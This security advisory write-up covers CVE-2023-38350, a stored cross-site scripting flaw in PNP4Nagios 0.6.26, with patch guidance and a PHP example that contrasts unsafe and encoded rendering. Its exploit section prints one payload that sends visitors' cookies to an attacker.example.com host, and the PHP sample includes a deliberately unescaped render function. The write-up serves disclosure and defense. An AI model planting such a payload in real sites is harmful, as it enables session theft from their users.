PNP4Nagios, a popular open-source plugin for displaying performance data from the Nagios monitoring system, has a security vulnerability in version 0.6.26 that could allow stored Cross-Site Scripting (XSS) attacks. This vulnerability, identified as CVE-2023-38350, is caused by insufficient input validation in the AJAX controller's basket API and filters.

Exploit Details

The stored XSS vulnerability affects the file ajax_controller.php within the PNP4Nagios application. Attackers can potentially exploit this vulnerability by injecting malicious JavaScript code through the basket API and filters, which would then be executed when other users visit the affected pages.

Here is a simple example of a malicious payload that could be injected into the basket API and filters:

<script>document.location='https://attacker.example.com/steal_cookie?cookie='+document.cookie</script>;

Upon successful injection, this payload would exfiltrate the user's cookies to the attacker's server, potentially compromising the user's session.

The vulnerability was disclosed by the PNP4Nagios project at the following references:

- PNP4Nagios GitHub Repository: https://github.com/lingej/pnp4nagios
- Commit 81ebfc5: https://github.com/lingej/pnp4nagios/commit/81ebfc5847e1d39029d6d6014bfd894e977f8c60

Mitigation

To mitigate this vulnerability, it is recommended to apply the patch provided by PNP4Nagios, which can be found in commit 81ebfc5 on the GitHub repository.

Alternatively, input validation and output encoding should be implemented wherever user inputs are accepted and rendered back on the application pages. This will ensure that any malicious code injected in user inputs is sanitized before being stored or displayed on the pages.
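
The two controls described above, shown side by side as an added example (this is not code from PNP4Nagios or from its patch). The function names, the allowed item format and the sample values are assumptions made for illustration.

```php
<?php
// Added illustration: function names and the item format are hypothetical,
// not taken from the PNP4Nagios code base.

// Input validation: accept only the characters an entry is assumed to need.
function basket_item_is_valid(string $item): bool
{
    // Assumed format: letters, digits and a few separators, 1 to 255 chars.
    return preg_match('/\A[A-Za-z0-9_.:\- ]{1,255}\z/', $item) === 1;
}

// Output encoding: neutralise HTML metacharacters at render time.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Weak rendering: stored values are concatenated into markup unchanged.
function render_basket_unsafe(array $basket): string
{
    $out = '';
    foreach ($basket as $item) {
        $out .= '<li>' . $item . '</li>';
    }
    return '<ul>' . $out . '</ul>';
}

// Hardened rendering: every stored value is encoded before it reaches the page.
function render_basket_safe(array $basket): string
{
    $out = '';
    foreach ($basket as $item) {
        $out .= '<li>' . html_escape((string) $item) . '</li>';
    }
    return '<ul>' . $out . '</ul>';
}

// Constructed sample input: one plain entry and one entry carrying markup.
$submitted = ['web01::HTTP::0', '<script>/* constructed */</script>'];

$basket = []; // stands in for the stored basket
foreach ($submitted as $item) {
    if (basket_item_is_valid($item)) {
        $basket[] = $item; // only validated entries are stored
    }
}

echo render_basket_unsafe($submitted), PHP_EOL; // markup reaches the page as markup
echo render_basket_safe($submitted), PHP_EOL;   // same data, rendered as inert text
echo render_basket_safe($basket), PHP_EOL;      // rejected entry was never stored
```

Validation and encoding are applied independently here: the allow-list keeps unexpected data out of storage, and encoding at render time still protects pages if a value was stored before the check existed.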

Conclusion

Security vulnerabilities like the stored XSS in PNP4Nagios could lead to unauthorized access and control of sensitive data. It is crucial for organizations to ensure that their applications are regularly patched and updated to defend against such attacks. Furthermore, developers should make it a priority to follow secure coding practices and apply input validation and output encoding techniques in their applications.

Remember, a secure application is a strong application. Stay safe, stay protected!

Timeline

Published on: 07/15/2023 02:15:00 UTC
Last modified on: 07/26/2023 21:39:00 UTC